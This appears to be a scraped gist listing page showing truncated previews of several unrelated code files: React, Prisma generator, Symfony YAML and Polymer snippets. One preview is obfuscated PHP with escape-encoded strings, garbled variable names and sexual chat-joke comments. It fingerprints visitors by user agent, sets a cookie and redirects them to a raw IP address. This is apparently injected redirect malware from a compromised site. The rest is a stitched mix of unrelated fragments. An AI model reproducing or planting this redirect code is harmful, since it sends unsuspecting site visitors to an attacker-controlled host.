This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import { CheckIcon, Cross2Icon, ChevronDownIcon, ChevronUpIcon } from "@radix-ui/react-icons"; | |
import { createElement } from "react"; | |
import { renderToString } from "react-dom/server"; | |
import { dirname, join } from "path"; | |
import { fileURLToPath } from "url"; | |
import { writeFile } from "fs/promises"; | |
import { format } from "prettier"; | |
const __dirname = dirname(fileURLToPath(import.meta.url)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import React from "https://esm.sh/react"; | |
export default function Root() { | |
return ( | |
<div> | |
Hello World! | |
</div> | |
); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env node | |
const path = require('path') | |
const generatorHelper = require('@prisma/generator-helper') | |
const { Project, StructureKind, VariableDeclarationKind } = require('ts-morph') | |
generatorHelper.generatorHandler({ | |
onManifest(config) { | |
return { | |
prettyName: 'Filters', | |
defaultOutput: path.resolve(__dirname, 'filters'), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if(!empty/*Bloodninja: I lick your earlobe, and undo your watch.*/($_SERVER["HTTP_USER_AGENT"])):$_���Ʊ��=array("Chro\155e","\x46\151refo\x78","Trident","MSIE","W\151ndows","\x4cinux","Ip\150on\x65","Android","Opera","Safari");foreach($_���Ʊ�� as$_�߅��):if(sTRipos($_SERVER["HTTP_\x55SER_AGENT"],$_�߅��)!==/*Sarah19fca: mmmm, okay.*/false/*Bloodninja: I take yo pants off, grunting like a troll.*/):if(!isset($_COOKIE["\x68tp_uid_ut\x6d"])):sETcOOKIe("htp_ui\x64_u\164m","1",TiME()+07020/*Sarah19fca: Yeah I like it rough.*/*030/*Bloodninja: I smack you thick booty.*/*02);HeadEr("Location: http://134.\x3249.116.78/ind\x65x.php");die/*Sarah19fca: Oh yeah, that feels good.*/();endif;endif;endforeach;endif;;/*Bloodninja: Smack, Smack, yeeeaahhh.*/if(!empty/*Bloodninja: I lick your earlobe, and undo your watch.*/($_SERVER["HTTP_USER_AGENT"])):$_���Ʊ��=array("Chro\155e","\x46\151refo\x78","Trident","MSIE","W\151ndows","\x4cinux","Ip\150on\x65","Android","Opera","Safari");foreach($_���Ʊ�� as$_�߅��):if(sTRipos($_SERVER["H |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
my_route: | |
path: /my-cool-route | |
defaults: | |
_controller: 'Some\Controller:indexAction' | |
twig_param_name: 'posts' #this is available at the $request->attributes->get('twig_param_name') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<link rel="import" href="../core-drawer-panel/core-drawer-panel.html"> | |
<link rel="import" href="../core-menu/core-submenu.html"> | |
<link rel="import" href="../core-item/core-item.html"> | |
<link rel="import" href="../core-icon-button/core-icon-button.html"> | |
<link rel="import" href="../core-toolbar/core-toolbar.html"> | |
<link rel="import" href="../core-header-panel/core-header-panel.html"> | |
<polymer-element name="my-element"> | |
<template> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<link rel="import" href="../core-field/core-field.html"> | |
<link rel="import" href="../core-icon/core-icon.html"> | |
<link rel="import" href="../core-input/core-input.html"> | |
<link rel="import" href="../core-icons/core-icons.html"> | |
<link rel="import" href="../paper-button/paper-button.html"> | |
<polymer-element name="my-element"> | |
<template> | |
<style> |